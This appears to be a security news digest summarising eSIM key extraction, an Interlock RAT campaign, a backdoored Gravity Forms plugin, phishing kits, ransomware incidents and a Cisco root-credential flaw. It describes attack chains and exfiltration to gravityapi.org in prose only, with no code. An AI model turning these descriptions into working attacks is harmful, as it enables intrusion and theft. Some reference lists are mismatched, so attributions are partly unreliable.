Cybersecurity researchers have uncovered critical vulnerabilities in Kigen's eSIM technology, potentially impacting billions of Internet of Things (IoT) devices and mobile networks worldwide. Security Explorations, a research lab, demonstrated that they could compromise Kigen's eUICC cards, a component essential for eSIM functionality. The attack allowed researchers to extract private encryption keys and download arbitrary eSIM profiles from major mobile network operators. This breach raises significant concerns about identity theft and the potential interception of communications for a vast number of connected devices.

The exploitation of these flaws builds upon prior Java Card research from 2019, which highlighted fundamental weaknesses in virtual machine implementations. Researchers were able to bypass security measures on the eUICC chip, which is designed to securely store and manage mobile carrier profiles. By exploiting type confusion vulnerabilities, they gained unauthorized access to the chip's memory, enabling the extraction of critical cryptographic keys like the private ECC key for GSMA certificates. This effectively undermined the trust model that underpins the entire eSIM ecosystem, as the eSIM profiles themselves and the Java applications stored on the chip were found to lack proper isolation or protection.

While Kigen has acknowledged the issue and deployed mitigations, including hardening bytecodes and tightening test profile rules, concerns remain regarding the root cause of the vulnerability. The GSMA TS.48 Generic Test Profile, versions 6.0 and earlier, has been identified as a contributing factor, allowing for the installation of unverified or malicious applets. Although the latest version of the GSMA standard addresses this, the existence of these fundamental flaws in widely deployed eSIM technology highlights the ongoing challenges in securing the rapidly expanding IoT landscape and the potential for widespread compromise if not adequately addressed.

Recommended read:
References :
  • Cyber Security News: New eSIM Hack Let Attackers Clobe your eSIM Profile Clone
  • securityaffairs.com: Experts uncover critical flaws in Kigen eSIM technology affecting billions
  • thehackernews.com: eSIM Vulnerability in Kigen's eUICC Cards Exposes Billions of IoT Devices to Malicious Attacks

@training.invokere.com //
Researchers have uncovered a new and sophisticated variant of the Interlock RAT, a remote access trojan associated with the Interlock ransomware group. This latest iteration is written in PHP, marking a departure from previously observed JavaScript-based versions. The malware is being distributed through a widespread campaign that leverages compromised websites and Cloudflare tunnels. The attack chain begins with a single-line script injected into website HTML, often unbeknownst to the website owners. This script employs IP filtering to serve the payload, which then manipulates the user into clicking a captcha for "verification," ultimately leading to the execution of a PowerShell script that deploys the Interlock RAT.

The delivery mechanism for this new PHP variant utilizes the KongTuke FileFix technique. Researchers have noted that this updated method has been observed deploying the PHP version of the Interlock RAT, and in some instances, this has subsequently led to the deployment of the Node.js variant of the same RAT. The capabilities of this Interlock RAT variant include remote control of compromised systems, thorough system reconnaissance, and the ability to perform lateral movement within a network. This demonstrates an evolving level of sophistication in the threat actor's tactics.

The DFIR Report, in collaboration with Proofpoint, identified the malware and its distribution methods. The observed execution involves a PowerShell command that deletes a scheduled task named "Updater" before downloading and executing a script from a specific URL. This script, in turn, abuses the `php.exe` executable from an uncommon location to further download and execute the RAT. Security professionals are advised to be aware of PowerShell spawning `php.exe` from unusual directories as a potential indicator of compromise. Additionally, the RAT's reconnaissance activities, such as running `systeminfo`, `tasklist`, `whoami`, or `nltest`, provide further opportunities for detection.

Recommended read:
References :

Aman Mishra@gbhackers.com //
Hackers have successfully compromised the popular WordPress plugin Gravity Forms, embedding malicious code into versions downloaded directly from the official gravityforms.com website. This sophisticated supply chain attack targets a significant portion of WordPress websites relying on Gravity Forms for form creation and data collection. The attackers are reportedly exploiting a vulnerability within the plugin, specifically targeting the gf_api_token parameter. This allows them to inject malicious PHP code into core plugin files, such as gravityforms/common.php and includes/settings/class-settings.php, creating backdoors that can lead to remote code execution and unauthorized access.

The malicious campaign was first detected when security researchers observed suspicious HTTP POST requests to a newly registered domain, gravityapi.org, which served as a command-and-control server. The injected malware is capable of exfiltrating sensitive WordPress site data, including URLs, plugin lists, user counts, and environment details, transmitting this information to the attacker-controlled domain. Upon receiving a response, the malware can deploy further payloads, such as writing a backdoored PHP file to the server that masquerades as legitimate content management tools. This backdoor enables attackers to execute arbitrary code, create new administrator accounts, upload files, and manipulate site content with devastating effects.

In response to the discovered vulnerability, Gravity Forms has swiftly released version 2.9.13 of the plugin, which is confirmed to be free of the backdoor. Additionally, the registrar Namecheap has suspended the malicious gravityapi.org domain to disrupt ongoing exploitation efforts. Website administrators are strongly advised to update their Gravity Forms plugin to the latest version immediately to mitigate the risk of compromise. Monitoring network traffic for suspicious activity, particularly POST requests to the identified malicious domain, is also a crucial step in preventing unauthorized access and code execution on affected WordPress sites.

Recommended read:
References :
  • cyberpress.org: WordPress GravityForms Plugin Targeted in Malicious Code Injection Attack
  • Ian Campbell: Just a heads-up on this supply chain attack on the Gravity Forms wordpress plugin, one IOC is POST requests to gravityapi[.]org - a 3 day old domain. That domain shares an IP with gravityapi[.]io. cc
  • Talkback Resources: WordPress Gravity Forms developer hacked to push backdoored plugins
  • gbhackers.com: Hackers Compromise WordPress GravityForms Plugin with Malicious Code Injection
  • Cyber Security News: WordPress GravityForms Plugin Targeted in Malicious Code Injection Attack
  • securityonline.info: WordPress Supply Chain Attack: Gravity Forms Plugin Backdoored Through Official Downloads
  • gbhackers.com: Hackers have targeted the popular WordPress plugin Gravity Forms, injecting malicious code into versions downloaded from the official gravityforms.com domain.

@www.helpnetsecurity.com //
References: cloudnativenow.com , DEVCLASS , Docker ...
Bitwarden Unveils Model Context Protocol Server for Secure AI Agent Integration

Bitwarden has launched its Model Context Protocol (MCP) server, a new tool designed to facilitate secure integration between AI agents and credential management workflows. The MCP server is built with a local-first architecture, ensuring that all interactions between client AI agents and the server remain within the user's local environment. This approach significantly minimizes the exposure of sensitive data to external threats. The new server empowers AI assistants by enabling them to access, generate, retrieve, and manage credentials while rigorously preserving zero-knowledge, end-to-end encryption. This innovation aims to allow AI agents to handle credential management securely without the need for direct human intervention, thereby streamlining operations and enhancing security protocols in the rapidly evolving landscape of artificial intelligence.

The Bitwarden MCP server establishes a foundational infrastructure for secure AI authentication, equipping AI systems with precisely controlled access to credential workflows. This means that AI assistants can now interact with sensitive information like passwords and other credentials in a managed and protected manner. The MCP server standardizes how applications connect to and provide context to large language models (LLMs), offering a unified interface for AI systems to interact with frequently used applications and data sources. This interoperability is crucial for streamlining agentic workflows and reducing the complexity of custom integrations. As AI agents become increasingly autonomous, the need for secure and policy-governed authentication is paramount, a challenge that the Bitwarden MCP server directly addresses by ensuring that credential generation and retrieval occur without compromising encryption or exposing confidential information.

This release positions Bitwarden at the forefront of enabling secure agentic AI adoption by providing users with the tools to seamlessly integrate AI assistants into their credential workflows. The local-first architecture is a key feature, ensuring that credentials remain on the user’s machine and are subject to zero-knowledge encryption throughout the process. The MCP server also integrates with the Bitwarden Command Line Interface (CLI) for secure vault operations and offers the option for self-hosted deployments, granting users greater control over system configurations and data residency. The Model Context Protocol itself is an open standard, fostering broader interoperability and allowing AI systems to interact with various applications through a consistent interface. The Bitwarden MCP server is now available through the Bitwarden GitHub repository, with plans for expanded distribution and documentation in the near future.

Recommended read:
References :
  • cloudnativenow.com: Docker. Inc. today extended its Docker Compose tool for creating container applications to include an ability to now also define architectures for artificial intelligence (AI) agents using YAML files.
  • DEVCLASS: Docker has added AI agent support to its Compose command, plus a new GPU-enabled Offload service which enables […]
  • Docker: Agents are the future, and if you haven’t already started building agents, you probably will soon.
  • Docker: Blog post on Docker MCP Gateway: Open Source, Secure Infrastructure for Agentic AI
  • CyberInsider: Bitwarden Launches MCP Server to Enable Secure AI Credential Management
  • discuss.privacyguides.net: Bitwarden sets foundation for secure AI authentication with MCP server
  • Help Net Security: Bitwarden MCP server equips AI systems with controlled access to credential workflows

@cyble.com //
Cyble threat intelligence researchers have uncovered a global phishing campaign leveraging the LogoKit phishing kit. This sophisticated kit is being used to target government, banking, and logistics sectors. The initial discovery stemmed from a phishing link mimicking the Hungary CERT login page, highlighting the campaign's ability to impersonate legitimate websites to steal credentials.

The LogoKit is designed to enhance credibility and increase the likelihood of successful credential theft. The phishing attacks often embed the victim's email address in the URL, pre-filling the username field on the spoofed login page. This personalized approach, combined with the kit's ability to dynamically generate convincing phishing pages, makes it a potent threat. CRIL analyzes show that the kit uses brand assets from Clearbit and Google Favicon to create realistic-looking login pages.

These phishing campaigns are part of a larger trend of surging identity attacks. Reports indicate a significant increase in cyberattacks targeting user logins. Cybercriminals are increasingly turning to sophisticated phishing-as-a-service platforms to conduct BEC schemes and ransomware disasters. Organizations should implement strong DNS security measures to protect against such threats.

Recommended read:
References :
  • thecyberexpress.com: Cyble threat intelligence researchers identified a phishing campaign aimed at Hungarian government targets that further investigation revealed was connected to wider global attack campaigns targeting the banking and logistics sectors.
  • cyble.com: The initial phishing link we identified mimicked the Hungary CERT login page, with the victim's email address prefilled in the username field to enhance credibility and increase the likelihood of credential submission.
  • The Register - Security: Phishing platforms, infostealers blamed as identity attacks soar
  • cyble.com: Cyble's blog post on the LogoKit phishing campaign being leveraged for credential theft.
  • Security Risk Advisors: 🚩 Active LogoKit Phishing Campaign Harvests Credentials Through Automated Brand Impersonation on Cloud Infrastructure

@gbhackers.com //
The rise of AI-assisted coding is introducing new security challenges, according to recent reports. Researchers are warning that the speed at which AI pulls in dependencies can lead to developers using software stacks they don't fully understand, thus expanding the cyber attack surface. John Morello, CTO at Minimus, notes that while AI isn't inherently good or bad, it magnifies both positive and negative behaviors, making it crucial for developers to maintain oversight and ensure the security of AI-generated code. This includes addressing vulnerabilities and prioritizing security in open source projects.

Kernel-level attacks on Windows systems are escalating through the exploitation of signed drivers. Cybercriminals are increasingly using code-signing certificates, often fraudulently obtained, to masquerade malicious drivers as legitimate software. Group-IB research reveals that over 620 malicious kernel-mode drivers and 80-plus code-signing certificates have been implicated in campaigns since 2020. A particularly concerning trend is the use of kernel loaders, which are designed to load second-stage components, giving attackers the ability to update their toolsets without detection.

A new supply-chain attack, dubbed "slopsquatting," is exploiting coding agent workflows to deliver malware. Unlike typosquatting, slopsquatting targets AI-powered coding assistants like Claude Code CLI and OpenAI Codex CLI. These agents can inadvertently suggest non-existent package names, which malicious actors then pre-register on public registries like PyPI. When developers use the AI-suggested installation commands, they unknowingly install malware, highlighting the need for multi-layered security approaches to mitigate this emerging threat.

Recommended read:
References :
  • Cyber Security News: Signed Drivers, Silent Threats: Kernel-Level Attacks on Windows Escalate via Trusted Tools
  • gbhackers.com: New Slopsquatting Attack Exploits Coding Agent Workflows to Deliver Malware

Lawrence Abrams@BleepingComputer //
References: bsky.app , Talkback Resources , nerds.xyz ...
Ingram Micro, a global IT distributor, has confirmed it was hit by a SafePay ransomware attack, causing a significant outage affecting its websites and internal systems. The attack, which began on July 3, 2025, has disrupted order processing and shipments, impacting customers, vendor partners, and others who rely on the company's services. Ingram Micro, one of the world's largest technology distributors with approximately 24,000 employees and $48 billion in revenue in 2024, is working diligently to restore affected systems.

The company's initial response involved proactively taking certain systems offline and implementing other mitigation measures to secure the environment. Leading cybersecurity experts were engaged to assist with the investigation, and law enforcement was notified. Ingram Micro said that internal alerts, investigation protocols, and communications with key clients and stakeholders were immediately initiated, a statement was released to explain the suspected vulnerabilities exploited by the ransomware.

Sources indicate that the SafePay ransomware group gained access through Ingram Micro's GlobalProtect VPN platform. The attack has impacted various systems, including the company's AI-powered Xvantage distribution platform and the Impulse license provisioning platform, leading to shipment backlogs and licensing interruptions across platforms such as Microsoft 365 and Dropbox. While it remains unclear if data was encrypted, the ransomware note claimed to have stolen various types of information. As a result, Ingram Micro's customers may experience delays as the company focuses on restoring its systems.

Recommended read:
References :
  • bsky.app: BleepingComputer reports on Ingram Micro experiencing a global outage impacting websites and internal systems.
  • Talkback Resources: BleepingComputer reports that an ongoing outage at IT giant Ingram Micro is caused by a SafePay ransomware attack.
  • Rescana: Ingram Micro Legacy Systems Outage: How the SafePay Ransomware Attack Disrupted Global Supply Chain Operations
  • nerds.xyz: Ingram Micro admits ransomware attack disrupted its systems and delayed shipments
  • The Register - Security: Ingram Micro confirms ransomware behind multi-day outage
  • Talkback Resources: Ingram Micro suffers global outage as internal systems inaccessible
  • Talkback Resources: Ingram Micro confirms ransomware behind multi-day outage
  • Blog: IT provider Ingram Micro hit by SafePay ransomware
  • techcrunch.com: Ingram Micro says ongoing outage caused by ransomware attack
  • Metacurity: IT giant Ingram Micro's systems shut down after SafePay ransomware attack
  • www.cybersecuritydive.com: Ingram Micro investigating ransomware attack
  • MicroScope: Ingram Micro hit by ransomware attack
  • www.itpro.com: Everything we know about the Ingram Micro cyber attack so far
  • www.metacurity.com: IT giant Ingram Micro's systems shut down after SafePay ransomware attack
  • www.it-daily.net: Serious hacker attack: Ingram Micro confirms ransomware
  • MicroScope: Ingram Micro ransomware attack contained and remediated
  • The Register - Software: Ingram Micro restarts orders – for some – following ransomware attack
  • Malware ? Graham Cluley: Ingram Micro confirms it has been hit by ransomware
  • cyberpress.org: Ingram Micro Recovers Operations Following Disruptive Ransomware Attack
  • www.cybersecuritydive.com: Ingram Micro restores global operations following hack

@sec.cloudapps.cisco.com //
Cisco is urging immediate action following the discovery of a critical vulnerability, CVE-2025-20309, in its Unified Communications Manager (Unified CM) and Unified Communications Manager Session Management Edition (Unified CM SME). The flaw stems from hardcoded SSH root credentials that cannot be modified or removed, potentially allowing remote attackers to gain root-level access to affected systems. This vulnerability has a maximum severity rating with a CVSS score of 10.0, indicating it can be easily exploited with devastating consequences.

Cisco's security advisory specifies that all Engineering Special (ES) releases from 15.0.1.13010-1 through 15.0.1.13017-1 are vulnerable, regardless of optional features in use. An unauthenticated remote attacker can exploit this vulnerability by utilizing the static root account credentials to establish SSH connections to vulnerable systems. Once authenticated, the attacker gains complete administrative control over the affected device, enabling the execution of arbitrary commands with root privileges.

There are no temporary workarounds to mitigate this risk. To remediate the vulnerability, administrators are advised to upgrade to version 15SU3 or apply the CSCwp27755 patch. Although Cisco discovered the flaw through internal testing and has not found evidence of active exploitation in the wild, the extreme severity necessitates immediate action to safeguard enterprise communications. The company has issued emergency fixes for the critical root credential flaw in Unified CM.

Recommended read:
References :
  • MeatMutts: Cisco Urges Immediate Action After Discovering Backdoor in Unified Communications Manager
  • infosec.exchange: : Unified Communications Manager systems could allow remote attackers to gain root-level access. The vulnerability CVE-2025-20309 with a maximum CVSS 10.0, stems from hardcoded SSH root credentials that cannot be modified or removed: 👇
  • Rescana: Critical Cisco Unified CM Vulnerability: Root Access via Static Credentials – Technical Analysis & Mitigation Strategies
  • cybersecuritynews.com: Unified Communications Manager systems could allow remote attackers to gain root-level access. The vulnerability CVE-2025-20309 with a maximum CVSS 10.0, stems from hardcoded SSH root credentials that cannot be modified or removed:
  • hackread.com: Cisco Issues Emergency Fix for Critical Root Credential Flaw in Unified CM
  • thecyberexpress.com: Cisco Issues Urgent Patch for Critical Unified CM Vulnerability (CVE-2025-20309)
  • Arctic Wolf: CVE-2025-20309: Cisco Unified Communications Manager Static SSH Credentials Maximum Severity Vulnerability
  • arcticwolf.com: CVE-2025-20309: Cisco Unified Communications Manager Static SSH Credentials Maximum Severity Vulnerability
  • sec.cloudapps.cisco.com: Security advisory from Cisco addressing the vulnerability.
  • The Register - Security: Cisco scores a perfect 10 - sadly for a critical flaw in its comms platform
  • nvd.nist.gov: Details of the Cisco vulnerability CVE-2025-20309.

@www.bleepingcomputer.com //
The Hunters International ransomware operation has announced its shutdown, stating they will release free decryption keys to their past victims. The group made the announcement on its dark web leak site, removing all previous victim data. In a statement, Hunters International acknowledged the impact their actions have had on organizations, stating the decision to close down was not made lightly. Victims are instructed to visit the ransomware gang's website to obtain the decryption keys and recovery guidance, though some sources indicate victims need to log in to a portal mentioned in the ransom note using existing credentials to obtain the decryption software.

The move to shut down has been met with skepticism from the threat intel community. Several ransomware gangs in the past have released their victims’ decryption keys, then shut down, each of them for different reasons. Some shut down only to return under a new name, perhaps in an attempt to confuse researchers and law enforcement agencies and sometimes toescape sanctions. There is speculation that Hunters International may be rebranding and transitioning to new infrastructure to avoid increased scrutiny from law enforcement. It emerged in late 2023 and was flagged by security researchers and ransomware experts as apotential rebrand of Hive, which had its infrastructure seized earlier that year.

Reports indicate that Hunters International launched a separate platform named "World Leaks" in January, advising its affiliates to switch to this new operation. At the time, the group claimed that encryption-based ransomware was no longer profitable and they would be shifting to a hack-and-extort model. However, some sources have found World Leaks victims who also had ransomware deployed on their networks. Hunters International has been linked to almost 300 attacks worldwide including India's Tata Technologies and the US Marshals Service and has earned millions in cryptocurrency.

Recommended read:
References :
  • infosec.exchange: NEW: The ransomware gang called Hunters International says it's shutting down and giving victims free decryption tools. “This decision was not made lightly, and we recognize the impact it has on the organizations we have interacted with,
  • Risky.Biz: Risky Bulletin: Hunters International ransomware shuts down and releases decryption keys
  • Risky Business Media: Risky Bulletin: Hunters International ransomware shuts down, releases decryption keys
  • techcrunch.com: Ransomware gang Hunters International says it’s shutting down
  • www.bleepingcomputer.com: Hunters International ransomware shuts down, releases free decryptors
  • Talkback Resources: Hunters International Ransomware Gang Rebrands as World Leaks
  • www.bitdefender.com: Hunters International ransomware group shuts down – but will it regroup under a new guise?
  • www.bleepingcomputer.com: Hunters International ransomware shuts down, releases free decryptors
  • techcrunch.com: NEW: The ransomware gang called Hunters International says it's shutting down and giving victims free decryption tools.
  • The Register - Security: Another news article covering Hunters International's shutdown.
  • Graham Cluley: Mastodon post discussing the Hunters International shutdown and possible rebranding.
  • slcyber.io: Blog post discussing the shutdown and potential rebranding of the Hunters International ransomware group.
  • bsky.app: Ransomware crew Hunters International shuts down, hands out keys to victims. Could law enforcement ops be having an impact on criminal confidence?
  • www.itpro.com: A prolific ransomware group says it’s shutting down and giving out free decryption keys to victims – but cyber experts warn it's not exactly a 'gesture of goodwill'
  • news.risky.biz: Risky Bulletin: Hunters International ransomware shuts down and releases decryption keys
  • securityaffairs.com: Hunters International ransomware gang shuts down and offers free decryption keys to all victims
  • WeLiveSecurity: WeLiveSecurity reports Hunters International ransomware group shuts down – but will it regroup under a new guise?